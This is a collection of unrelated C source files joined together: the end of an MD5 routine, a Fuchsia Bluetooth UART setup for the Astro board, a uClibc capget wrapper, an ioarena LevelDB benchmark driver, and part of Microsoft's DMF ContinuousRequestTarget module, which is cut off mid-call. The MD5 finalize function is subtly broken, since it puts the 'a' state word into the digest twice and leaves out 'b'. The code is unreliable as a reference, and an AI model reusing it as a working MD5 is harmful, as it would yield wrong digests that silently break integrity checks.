STEP( H, d, a, b, c, block[4], 0x4bdecfa9, 11 ) STEP( H, c, d, a, b, block[7], 0xf6bb4b60, 16 ) STEP( H, b, c, d, a, block[10], 0xbebfbc70, 23 ) STEP( H, a, b, c, d, block[13], 0x289b7ec6, 4 ) STEP( H, d, a, b, c, block[0], 0xeaa127fa, 11 ) STEP( H, c, d, a, b, block[3], 0xd4ef3085, 16 ) STEP( H, b, c, d, a, block[6], 0x04881d05, 23 ) STEP( H, a, b, c, d, block[9], 0xd9d4d039, 4 ) STEP( H, d, a, b, c, block[12], 0xe6db99e5, 11 ) STEP( H, c, d, a, b, block[15], 0x1fa27cf8, 16 ) STEP( H, b, c, d, a, block[2], 0xc4ac5665, 23 ) // Round 4 STEP( I, a, b, c, d, block[0], 0xf4292244, 6 ) STEP( I, d, a, b, c, block[7], 0x432aff97, 10 ) STEP( I, c, d, a, b, block[14], 0xab9423a7, 15 ) STEP( I, b, c, d, a, block[5], 0xfc93a039, 21 ) STEP( I, a, b, c, d, block[12], 0x655b59c3, 6 ) STEP( I, d, a, b, c, block[3], 0x8f0ccc92, 10 ) STEP( I, c, d, a, b, block[10], 0xffeff47d, 15 ) STEP( I, b, c, d, a, block[1], 0x85845dd1, 21 ) STEP( I, a, b, c, d, block[8], 0x6fa87e4f, 6 ) STEP( I, d, a, b, c, block[15], 0xfe2ce6e0, 10 ) STEP( I, c, d, a, b, block[6], 0xa3014314, 15 ) STEP( I, b, c, d, a, block[13], 0x4e0811a1, 21 ) STEP( I, a, b, c, d, block[4], 0xf7537e82, 6 ) STEP( I, d, a, b, c, block[11], 0xbd3af235, 10 ) STEP( I, c, d, a, b, block[2], 0x2ad7d2bb, 15 ) STEP( I, b, c, d, a, block[9], 0xeb86d391, 21 ) a += saved_a; b += saved_b; c += saved_c; d += saved_d; ptr += 16; } while (size -= 64); ctx->a = a; ctx->b = b; ctx->c = c; ctx->d = d; return ptr; } void md5_initialize (Md5Context *ctx) { // sanity for (unsigned i=0; i < sizeof(Md5Context); i++) ASSERTE0 (!((char *)ctx)[i], "md5_initialize expects ctx to be zeros, but its not"); ctx->a = 0x67452301; ctx->b = 0xefcdab89; ctx->c = 0x98badcfe; ctx->d = 0x10325476; ctx->lo = 0; ctx->hi = 0; ctx->initialized = true; } // data must be aligned on 32-bit boundary void md5_update (Md5Context *ctx, const void *data, uint32_t len) { START_TIMER; if (!len) return; // nothing to do uint32_t saved_lo; uint32_t used; uint32_t free; saved_lo = ctx->lo; if ((ctx->lo = (saved_lo + len) & 0x1fffffff) < saved_lo) ctx->hi++; ctx->hi += (uint32_t)(len >> 29); used = saved_lo & 0x3f; if (used) { free = 64 - used; if (len < free) { memcpy (&ctx->buffer.bytes[used], data, len); goto finish; } memcpy (&ctx->buffer.bytes[used], data, free); data += free; len -= free; md5_transform (ctx, ctx->buffer.bytes, 64); } if (len >= 64) { data = md5_transform (ctx, data, len & ~(unsigned long)0x3f); len &= 0x3f; } memcpy (ctx->buffer.bytes, data, len); finish: //fprintf (stderr, "%s md5_update snapshot: %s\n", primary_command == ZIP ? "ZIP" : "PIZ", digest_display (digest_snapshot (ctx))); //md5_display_ctx (ctx); COPY_TIMER_VB (evb, md5); return; } Digest md5_finalize (Md5Context *ctx) { START_TIMER; uint32_t used; uint32_t free; used = ctx->lo & 0x3f; ctx->buffer.bytes[used++] = 0x80; free = 64 - used; if (free < 8) { memset (&ctx->buffer.bytes[used], 0, free); md5_transform (ctx, ctx->buffer.bytes, 64); used = 0; free = 64; } memset (&ctx->buffer.bytes[used], 0, free - 8); ctx->lo <<= 3; ctx->buffer.words[14] = LTEN32 (ctx->lo); ctx->buffer.words[15] = LTEN32 (ctx->hi); md5_transform (ctx, ctx->buffer.bytes, 64); Digest digest = { .words = { LTEN32 (ctx->a), LTEN32 (ctx->a), LTEN32 (ctx->c), LTEN32 (ctx->d) } }; memset (ctx, 0, sizeof (Md5Context)); // return to its pre-initialized state, should it be used again COPY_TIMER_VB (evb, md5); return digest; } // note: data must be aligned to the 32bit boundary (its accessed as uint32_t*) Digest md5_do (const void *data, uint32_t len) { Md5Context ctx; memset (&ctx, 0, sizeof(Md5Context)); md5_initialize (&ctx); md5_update (&ctx, data, len); return md5_finalize (&ctx); }
881766.c
// Copyright 2018 The Fuchsia Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include <unistd.h> #include <ddk/debug.h> #include <ddk/device.h> #include <ddk/mmio-buffer.h> #include <ddk/metadata.h> #include <ddk/platform-defs.h> #include <ddk/protocol/gpioimpl.h> #include <ddk/protocol/platform/bus.h> #include <ddk/protocol/serial.h> #include <hw/reg.h> #include <soc/aml-s905d2/s905d2-gpio.h> #include <soc/aml-s905d2/s905d2-hw.h> #include <zircon/device/serial.h> #include "astro.h" #define SOC_WIFI_LPO_32k768 S905D2_GPIOX(16) #define SOC_BT_REG_ON S905D2_GPIOX(17) static const pbus_mmio_t bt_uart_mmios[] = { { .base = S905D2_UART_A_BASE, .length = S905D2_UART_A_LENGTH, }, }; static const pbus_irq_t bt_uart_irqs[] = { { .irq = S905D2_UART_A_IRQ, .mode = ZX_INTERRUPT_MODE_EDGE_HIGH, }, }; static const serial_port_info_t bt_uart_serial_info = { .serial_class = SERIAL_CLASS_BLUETOOTH_HCI, .serial_vid = PDEV_VID_BROADCOM, .serial_pid = PDEV_PID_BCM43458, }; static const pbus_metadata_t bt_uart_metadata[] = { { .type = DEVICE_METADATA_SERIAL_PORT_INFO, .data_buffer = &bt_uart_serial_info, .data_size = sizeof(bt_uart_serial_info), }, }; static const pbus_boot_metadata_t bt_uart_boot_metadata[] = { { .zbi_type = DEVICE_METADATA_MAC_ADDRESS, .zbi_extra = MACADDR_BLUETOOTH, }, }; static pbus_dev_t bt_uart_dev = { .name = "bt-uart", .vid = PDEV_VID_AMLOGIC, .pid = PDEV_PID_GENERIC, .did = PDEV_DID_AMLOGIC_UART, .mmio_list = bt_uart_mmios, .mmio_count = countof(bt_uart_mmios), .irq_list = bt_uart_irqs, .irq_count = countof(bt_uart_irqs), .metadata_list = bt_uart_metadata, .metadata_count = countof(bt_uart_metadata), .boot_metadata_list = bt_uart_boot_metadata, .boot_metadata_count = countof(bt_uart_boot_metadata), }; // Enables and configures PWM_E on the SOC_WIFI_LPO_32k768 line for the Wifi/Bluetooth module static zx_status_t aml_enable_wifi_32K(aml_bus_t* bus) { // Configure SOC_WIFI_LPO_32k768 pin for PWM_E zx_status_t status = gpio_impl_set_alt_function(&bus->gpio, SOC_WIFI_LPO_32k768, 1); if (status != ZX_OK) return status; zx_handle_t bti; status = iommu_get_bti(&bus->iommu, 0, BTI_BOARD, &bti); if (status != ZX_OK) { zxlogf(ERROR, "aml_enable_wifi_32K: iommu_get_bti failed: %d\n", status); return status; } mmio_buffer_t buffer; // Please do not use get_root_resource() in new code. See ZX-1497. status = mmio_buffer_init_physical(&buffer, S905D2_PWM_BASE, 0x1a000, get_root_resource(), ZX_CACHE_POLICY_UNCACHED_DEVICE); if (status != ZX_OK) { zxlogf(ERROR, "aml_enable_wifi_32K: mmio_buffer_init_physical failed: %d\n", status); zx_handle_close(bti); return status; } uint32_t* regs = buffer.vaddr; // these magic numbers were gleaned by instrumenting drivers/amlogic/pwm/pwm_meson.c // TODO(voydanoff) write a proper PWM driver writel(0x016d016e, regs + S905D2_PWM_PWM_E); writel(0x016d016d, regs + S905D2_PWM_E2); writel(0x0a0a0609, regs + S905D2_PWM_TIME_EF); writel(0x02808003, regs + S905D2_PWM_MISC_REG_EF); mmio_buffer_release(&buffer); zx_handle_close(bti); return ZX_OK; } zx_status_t aml_bluetooth_init(aml_bus_t* bus) { zx_status_t status; // set alternate functions to enable Bluetooth UART status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_TX_A, S905D2_UART_TX_A_FN); if (status != ZX_OK) return status; status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_RX_A, S905D2_UART_RX_A_FN); if (status != ZX_OK) return status; status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_CTS_A, S905D2_UART_CTS_A_FN); if (status != ZX_OK) return status; status = gpio_impl_set_alt_function(&bus->gpio, S905D2_UART_RTS_A, S905D2_UART_RTS_A_FN); if (status != ZX_OK) return status; // Configure the SOC_WIFI_LPO_32k768 PWM, which is needed for the Bluetooth module to work properly status = aml_enable_wifi_32K(bus); if (status != ZX_OK) { return status; } // set GPIO to reset Bluetooth module gpio_impl_config_out(&bus->gpio, SOC_BT_REG_ON, 0); usleep(10 * 1000); gpio_impl_write(&bus->gpio, SOC_BT_REG_ON, 1); usleep(100 * 1000); // Bind UART for Bluetooth HCI status = pbus_device_add(&bus->pbus, &bt_uart_dev); if (status != ZX_OK) { zxlogf(ERROR, "aml_uart_init: pbus_device_add failed: %d\n", status); return status; } return ZX_OK; }
152632.c
/* vi: set sw=4 ts=4: */ /* * capget() for uClibc * * Copyright (C) 2000-2006 Erik Andersen <andersen@uclibc.org> * * Licensed under the LGPL v2.1, see the file COPYING.LIB in this tarball. */ #include <sys/syscall.h> int capget(void *header, void *data); #ifdef __NR_capget _syscall2(int, capget, void *, header, void *, data); #else int capget(void *header, void *data) { __set_errno(ENOSYS); return -1; } #endif
175174.c
 /* * ioarena: embedded storage benchmarking * * Copyright (c) ioarena authors * BSD License */ #include "ioarena.h" #include "leveldb/c.h" struct iaprivate { leveldb_options_t *opts; leveldb_readoptions_t *ropts; leveldb_writeoptions_t *wopts; leveldb_t *db; }; struct iacontext { leveldb_iterator_t *it; leveldb_writebatch_t *batch; char *result; }; static int ia_leveldb_open(const char *datadir) { iadriver *drv = ioarena.driver; drv->priv = calloc(1, sizeof(iaprivate)); if (drv->priv == NULL) return -1; iaprivate *self = drv->priv; self->opts = leveldb_options_create(); leveldb_options_set_compression(self->opts, leveldb_no_compression); leveldb_options_set_info_log(self->opts, NULL); leveldb_options_set_create_if_missing(self->opts, 1); self->wopts = leveldb_writeoptions_create(); self->ropts = leveldb_readoptions_create(); leveldb_readoptions_set_fill_cache(self->ropts, 1); /* LY: suggestions are welcome */ switch (ioarena.conf.syncmode) { case IA_SYNC: leveldb_writeoptions_set_sync(self->wopts, 1); break; case IA_LAZY: case IA_NOSYNC: leveldb_writeoptions_set_sync(self->wopts, 0); break; default: ia_log("error: %s(): unsupported syncmode %s", __func__, ia_syncmode2str(ioarena.conf.syncmode)); return -1; } switch (ioarena.conf.walmode) { case IA_WAL_INDEF: case IA_WAL_ON: break; case IA_WAL_OFF: default: ia_log("error: %s(): unsupported walmode %s", __func__, ia_walmode2str(ioarena.conf.walmode)); return -1; } char *error = NULL; self->db = leveldb_open(self->opts, datadir, &error); if (error != NULL) goto bailout; return 0; bailout: ia_log("error: %s, %s", __func__, error); free(error); return -1; } static int ia_leveldb_close(void) { iaprivate *self = ioarena.driver->priv; if (self) { ioarena.driver->priv = NULL; if (self->db) leveldb_close(self->db); if (self->ropts) leveldb_readoptions_destroy(self->ropts); if (self->wopts) leveldb_writeoptions_destroy(self->wopts); if (self->opts) leveldb_options_destroy(self->opts); free(self); } return 0; } static iacontext *ia_leveldb_thread_new(void) { iacontext *ctx = calloc(1, sizeof(iacontext)); return ctx; } void ia_leveldb_thread_dispose(iacontext *ctx) { if (ctx->result) free(ctx->result); if (ctx->it) leveldb_iter_destroy(ctx->it); if (ctx->batch) leveldb_writebatch_destroy(ctx->batch); free(ctx); } static int ia_leveldb_begin(iacontext *ctx, iabenchmark step) { iaprivate *self = ioarena.driver->priv; int rc = 0; const char *error = NULL; switch (step) { case IA_GET: case IA_SET: case IA_DELETE: break; case IA_ITERATE: ctx->it = leveldb_create_iterator(self->db, self->ropts); if (!ctx->it) { error = "leveldb_create_iterator() failed"; goto bailout; } leveldb_iter_seek_to_first(ctx->it); break; case IA_CRUD: case IA_BATCH: ctx->batch = leveldb_writebatch_create(); if (!ctx->batch) { error = "leveldb_writebatch_create() failed"; goto bailout; } break; default: assert(0); rc = -1; } return rc; bailout: ia_log("error: %s, %s, %s", __func__, ia_benchmarkof(step), error); return -1; } static int ia_leveldb_done(iacontext *ctx, iabenchmark step) { iaprivate *self = ioarena.driver->priv; int rc = 0; char *error = NULL; switch (step) { case IA_GET: if (ctx->result) { free(ctx->result); ctx->result = NULL; } case IA_SET: case IA_DELETE: break; case IA_ITERATE: if (ctx->it) { leveldb_iter_destroy(ctx->it); ctx->it = NULL; } break; case IA_CRUD: case IA_BATCH: if (ctx->batch) { leveldb_write(self->db, self->wopts, ctx->batch, &error); if (error != NULL) goto bailout; leveldb_writebatch_destroy(ctx->batch); ctx->batch = NULL; } break; default: assert(0); rc = -1; } return rc; bailout: ia_log("error: %s, %s, %s", __func__, ia_benchmarkof(step), error); free(error); return -1; } static int ia_leveldb_next(iacontext *ctx, iabenchmark step, iakv *kv) { iaprivate *self = ioarena.driver->priv; int rc = 0; char *error = NULL; switch (step) { case IA_SET: if (ctx->batch) leveldb_writebatch_put(ctx->batch, kv->k, kv->ksize, kv->v, kv->vsize); else leveldb_put(self->db, self->wopts, kv->k, kv->ksize, kv->v, kv->vsize, &error); if (error) goto bailout; break; case IA_DELETE: if (ctx->batch) leveldb_writebatch_delete(ctx->batch, kv->k, kv->ksize); else leveldb_delete(self->db, self->wopts, kv->k, kv->ksize, &error); if (error) goto bailout; break; case IA_GET: if (ctx->result) free(ctx->result); ctx->result = leveldb_get(self->db, self->ropts, kv->k, kv->ksize, &kv->vsize, &error); if (error) goto bailout; if (!ctx->result) { if (!ctx->batch) /* TODO: rework to avoid */ { rc = ENOENT; break; } } kv->v = ctx->result; break; case IA_ITERATE: if (!leveldb_iter_valid(ctx->it)) return ENOENT; kv->k = (char *)leveldb_iter_key(ctx->it, &kv->ksize); leveldb_iter_next(ctx->it); break; default: assert(0); rc = -1; } return rc; bailout: ia_log("error: %s, %s, %s", __func__, ia_benchmarkof(step), error); free(error); return -1; } iadriver ia_leveldb = {.name = "leveldb", .priv = NULL, .open = ia_leveldb_open, .close = ia_leveldb_close, .thread_new = ia_leveldb_thread_new, .thread_dispose = ia_leveldb_thread_dispose, .begin = ia_leveldb_begin, .next = ia_leveldb_next, .done = ia_leveldb_done};
335326.c
/*++ Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT license. Module Name: Dmf_ContinuousRequestTarget.c Abstract: Creates a stream of asynchronous requests to a specific IO Target. Also, there is support for sending synchronous requests to the same IO Target. Environment: Kernel-mode Driver Framework User-mode Driver Framework --*/ // DMF and this Module's Library specific definitions. // #include "DmfModule.h" #include "DmfModules.Library.h" #include "DmfModules.Library.Trace.h" #include "Dmf_ContinuousRequestTarget.tmh" /////////////////////////////////////////////////////////////////////////////////////////////////////// // Module Private Enumerations and Structures /////////////////////////////////////////////////////////////////////////////////////////////////////// // /////////////////////////////////////////////////////////////////////////////////////////////////////// // Module Private Context /////////////////////////////////////////////////////////////////////////////////////////////////////// // typedef struct { // Input Buffer List. // DMFMODULE DmfModuleBufferPoolInput; // Output Buffer List. // DMFMODULE DmfModuleBufferPoolOutput; // Context Buffer List. // DMFMODULE DmfModuleBufferPoolContext; // Queued workitem for passive level completion routine. // Stream Asynchronous Request. // DMFMODULE DmfModuleQueuedWorkitemStream; // Queued workitem for passive level completion routine. // Single Asynchronous Request. // DMFMODULE DmfModuleQueuedWorkitemSingle; // Completion routine for stream asynchronous requests. // EVT_WDF_REQUEST_COMPLETION_ROUTINE* CompletionRoutineStream; // IO Target to Send Requests to. // WDFIOTARGET IoTarget; // Indicates that the Client has stopped streaming. This flag prevents new requests from // being sent to the underlying target. // BOOLEAN Stopping; // Count of requests in lower driver so that Module can shutdown gracefully. // NOTE: This is for User-mode rundown support. Once Rundown support is unified for // Kernel and user-modes, this can be removed. // LONG PendingStreamingRequests; // Count of streaming requests so that Module can shutdown gracefully. // LONG StreamingRequestCount; // Collection of asynchronous stream requests. This is the Collection of requests that is created // when the Module is instantiated. // WDFCOLLECTION CreatedStreamRequestsCollection; // Collection of asynchronous transient stream requests. Requests are added to this collection when // streaming starts and are removed when streaming stops. // WDFCOLLECTION TransientStreamRequestsCollection; // Rundown for sending stream requests. // DMF_PORTABLE_RUNDOWN_REF StreamRequestsRundown; // Rundown for in-flight stream requests. // DMF_PORTABLE_EVENT StreamRequestsRundownCompletionEvent; } DMF_CONTEXT_ContinuousRequestTarget; // This macro declares the following function: // DMF_CONTEXT_GET() // DMF_MODULE_DECLARE_CONTEXT(ContinuousRequestTarget) // This macro declares the following function: // DMF_CONFIG_GET() // DMF_MODULE_DECLARE_CONFIG(ContinuousRequestTarget) // Memory Pool Tag. // #define MemoryTag 'mTRC' /////////////////////////////////////////////////////////////////////////////////////////////////////// // DMF Module Support Code /////////////////////////////////////////////////////////////////////////////////////////////////////// // #define DEFAULT_NUMBER_OF_PENDING_PASSIVE_LEVEL_COMPLETION_ROUTINES 4 typedef struct { DMFMODULE DmfModule; ContinuousRequestTarget_RequestType SingleAsynchronousRequestType; EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest; VOID* SingleAsynchronousCallbackClientContext; } ContinuousRequestTarget_SingleAsynchronousRequestContext; typedef struct { WDFREQUEST Request; WDF_REQUEST_COMPLETION_PARAMS RequestCompletionParams; ContinuousRequestTarget_SingleAsynchronousRequestContext* SingleAsynchronousRequestContext; } ContinuousRequestTarget_QueuedWorkitemContext; static VOID ContinuousRequestTarget_PrintDataReceived( _In_reads_bytes_(Length) BYTE* Buffer, _In_ ULONG Length ) /*++ Routine Description: Prints every byte stored in buffer of a given length. Arguments: Buffer: Pointer to a buffer Length: Length of the buffer Return Value: None --*/ { UNREFERENCED_PARAMETER(Buffer); UNREFERENCED_PARAMETER(Length); #if defined(DEBUG) ULONG bufferIndex; TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "BufferStart"); for (bufferIndex = 0; bufferIndex < Length; bufferIndex++) { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "%02X", *(Buffer + bufferIndex)); } TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "BufferEnd"); #endif // defined(DEBUG) } static VOID ContinuousRequestTarget_DeleteStreamRequestsFromCollection( _In_ DMF_CONTEXT_ContinuousRequestTarget* ModuleContext ) /*++ Routine Description: Remove and delete requests collected in CreatedStreamRequestsCollection. Arguments: ModuleContext - This Module's context. Return Value: None --*/ { WDFREQUEST request; while ((request = (WDFREQUEST)WdfCollectionGetFirstItem(ModuleContext->CreatedStreamRequestsCollection)) != NULL) { WdfCollectionRemoveItem(ModuleContext->CreatedStreamRequestsCollection, 0); WdfObjectDelete(request); } } #if !defined(DMF_USER_MODE) static VOID ContinuousRequestTarget_DecreaseStreamRequestCount( _In_ DMF_CONTEXT_ContinuousRequestTarget* ModuleContext ) /*++ Routine Description: Decrease the total number of active streaming requests by 1. If the count reaches 0, signal the rundown completion event. Arguments: ModuleContext - This Module's context. Return Value: None --*/ { LONG result; result = InterlockedDecrement(&ModuleContext->StreamingRequestCount); DmfAssert(result >= 0); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "[%d -> %d]", result + 1, result); if (0 == result) { DMF_Portable_EventSet(&ModuleContext->StreamRequestsRundownCompletionEvent); TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "StreamRequestsRundownCompletionEvent SET"); } } #endif static VOID ContinuousRequestTarget_CompletionParamsInputBufferAndOutputBufferGet( _In_ DMFMODULE DmfModule, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ ContinuousRequestTarget_RequestType RequestType, _Out_ VOID** InputBuffer, _Out_ size_t* InputBufferSize, _Out_ VOID** OutputBuffer, _Out_ size_t* OutputBufferSize ) /*++ Routine Description: This routine is called in Completion routine of Asynchronous requests. It returns the right input buffer and output buffer pointers based on the Request type (Read/Write/Ioctl) specified in Module Config. It also returns the input and output buffer sizes Arguments: DmfModule - This Module's handle. CompletionParams - Information about the completion. RequestType - Type of request. InputBuffer - Pointer to Input buffer. InputBufferSize - Size of Input buffer. OutputBuffer - Pointer to Output buffer. OutputBufferSize - Size of Output buffer. Return Value: None --*/ { DMF_CONFIG_ContinuousRequestTarget* moduleConfig; WDFMEMORY inputMemory; WDFMEMORY outputMemory; FuncEntry(DMF_TRACE); moduleConfig = DMF_CONFIG_GET(DmfModule); *InputBufferSize = 0; *InputBuffer = NULL; *OutputBufferSize = 0; *OutputBuffer = NULL; switch (RequestType) { case ContinuousRequestTarget_RequestType_Read: { // Get the read buffer memory handle. // *OutputBufferSize = CompletionParams->Parameters.Read.Length; outputMemory = CompletionParams->Parameters.Read.Buffer; // Get the read buffer. // if (outputMemory != NULL) { *OutputBuffer = WdfMemoryGetBuffer(outputMemory, NULL); DmfAssert(*OutputBuffer != NULL); } break; } case ContinuousRequestTarget_RequestType_Write: { // Get the write buffer memory handle. // *InputBufferSize = CompletionParams->Parameters.Write.Length; inputMemory = CompletionParams->Parameters.Write.Buffer; // Get the write buffer. // if (inputMemory != NULL) { *InputBuffer = WdfMemoryGetBuffer(inputMemory, NULL); DmfAssert(*InputBuffer != NULL); } break; } case ContinuousRequestTarget_RequestType_Ioctl: case ContinuousRequestTarget_RequestType_InternalIoctl: { // Get the input and output buffers' memory handles. // inputMemory = CompletionParams->Parameters.Ioctl.Input.Buffer; outputMemory = CompletionParams->Parameters.Ioctl.Output.Buffer; // Get the input and output buffers. // if (inputMemory != NULL) { *InputBuffer = WdfMemoryGetBuffer(inputMemory, InputBufferSize); DmfAssert(*InputBuffer != NULL); } if (outputMemory != NULL) { *OutputBuffer = WdfMemoryGetBuffer(outputMemory, OutputBufferSize); DmfAssert(*OutputBufferSize >= CompletionParams->Parameters.Ioctl.Output.Length); *OutputBufferSize = CompletionParams->Parameters.Ioctl.Output.Length; DmfAssert(*OutputBuffer != NULL); } break; } default: { DmfAssert(FALSE); } } } VOID ContinuousRequestTarget_ProcessAsynchronousRequestSingle( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ ContinuousRequestTarget_SingleAsynchronousRequestContext* SingleAsynchronousRequestContext ) /*++ Routine Description: This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: DmfModule - The given Dmf Module. Request - The completed request. CompletionParams - Information about the completion. SingleAsynchronousRequestContext - Single asynchronous request context. Return Value: None --*/ { NTSTATUS ntStatus; VOID* inputBuffer; size_t inputBufferSize; VOID* outputBuffer; size_t outputBufferSize; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; FuncEntry(DMF_TRACE); inputBuffer = NULL; outputBuffer = NULL; moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); ntStatus = WdfRequestGetStatus(Request); if (!NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestGetStatus Request=0x%p fails: ntStatus=%!STATUS!", Request, ntStatus); } // Get information about the request completion. // WdfRequestGetCompletionParams(Request, CompletionParams); // Get the input and output buffers. // Input buffer will be NULL for request type read and write. // ContinuousRequestTarget_CompletionParamsInputBufferAndOutputBufferGet(DmfModule, CompletionParams, SingleAsynchronousRequestContext->SingleAsynchronousRequestType, &inputBuffer, &inputBufferSize, &outputBuffer, &outputBufferSize); // Call the Client's callback function // if (SingleAsynchronousRequestContext->EvtContinuousRequestTargetSingleAsynchronousRequest != NULL) { (SingleAsynchronousRequestContext->EvtContinuousRequestTargetSingleAsynchronousRequest)(DmfModule, SingleAsynchronousRequestContext->SingleAsynchronousCallbackClientContext, inputBuffer, inputBufferSize, outputBuffer, outputBufferSize, ntStatus); } // The Request is complete. // Put the buffer associated with single asynchronous request back into BufferPool. // DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolContext, SingleAsynchronousRequestContext); WdfObjectDelete(Request); DMF_ModuleDereference(DmfModule); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_CompletionRoutine; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_CompletionRoutine( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Single Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { ContinuousRequestTarget_SingleAsynchronousRequestContext* singleAsynchronousRequestContext; DMFMODULE dmfModule; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); singleAsynchronousRequestContext = (ContinuousRequestTarget_SingleAsynchronousRequestContext*)Context; DmfAssert(singleAsynchronousRequestContext != NULL); dmfModule = singleAsynchronousRequestContext->DmfModule; DmfAssert(dmfModule != NULL); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Completion Request]", Request); ContinuousRequestTarget_ProcessAsynchronousRequestSingle(dmfModule, Request, CompletionParams, singleAsynchronousRequestContext); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_CompletionRoutinePassive; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_CompletionRoutinePassive( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Single Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { ContinuousRequestTarget_SingleAsynchronousRequestContext* singleAsynchronousRequestContext; DMFMODULE dmfModule; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; ContinuousRequestTarget_QueuedWorkitemContext workitemContext; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); singleAsynchronousRequestContext = (ContinuousRequestTarget_SingleAsynchronousRequestContext*)Context; DmfAssert(singleAsynchronousRequestContext != NULL); dmfModule = singleAsynchronousRequestContext->DmfModule; DmfAssert(dmfModule != NULL); moduleContext = DMF_CONTEXT_GET(dmfModule); workitemContext.Request = Request; workitemContext.RequestCompletionParams = *CompletionParams; workitemContext.SingleAsynchronousRequestContext = singleAsynchronousRequestContext; TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Enqueue Completion]", Request); DMF_QueuedWorkItem_Enqueue(moduleContext->DmfModuleQueuedWorkitemSingle, (VOID*)&workitemContext, sizeof(ContinuousRequestTarget_QueuedWorkitemContext)); FuncExitVoid(DMF_TRACE); } // The completion routine calls this function so it needs to be declared here. // static NTSTATUS ContinuousRequestTarget_StreamRequestSend( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request ); VOID ContinuousRequestTarget_ProcessAsynchronousRequestStream( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams ) /*++ Routine Description: This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers. Arguments: DmfModule - The given Dmf Module. Request - The completed request. CompletionParams - Information about the completion. Return Value: None --*/ { NTSTATUS ntStatus; VOID* inputBuffer; size_t inputBufferSize; VOID* outputBuffer; size_t outputBufferSize; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; ContinuousRequestTarget_BufferDisposition bufferDisposition; VOID* clientBufferContextOutput; FuncEntry(DMF_TRACE); inputBuffer = NULL; outputBuffer = NULL; moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); ntStatus = WdfRequestGetStatus(Request); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "WdfRequestGetStatus Request=0x%p completes: ntStatus=%!STATUS!", Request, ntStatus); // Get information about the request completion. // WdfRequestGetCompletionParams(Request, CompletionParams); // Get the input and output buffers. // Input buffer will be NULL for request type read and write. // ContinuousRequestTarget_CompletionParamsInputBufferAndOutputBufferGet(DmfModule, CompletionParams, moduleConfig->RequestType, &inputBuffer, &inputBufferSize, &outputBuffer, &outputBufferSize); if (outputBuffer != NULL) { DMF_BufferPool_ContextGet(moduleContext->DmfModuleBufferPoolOutput, outputBuffer, &clientBufferContextOutput); // If Client has stopped streaming, then regardless of what the Client returns from the callback, return buffers // back to the original state and delete corresponding requests. // if (moduleContext->Stopping) { TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Request=0x%p [STOPPED]", Request); bufferDisposition = ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndStopStreaming; } else { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Not Stopped]", Request); if (NT_SUCCESS(ntStatus)) { ContinuousRequestTarget_PrintDataReceived((BYTE*)outputBuffer, (ULONG)outputBufferSize); } // Call the Client's callback function to give the Client Buffer a chance to use the output buffer. // The Client returns TRUE if Client expects this Module to return the buffer to its own list. // Otherwise, the Client will take ownership of the buffer and return it later using a Module Method. // bufferDisposition = moduleConfig->EvtContinuousRequestTargetBufferOutput(DmfModule, outputBuffer, outputBufferSize, clientBufferContextOutput, 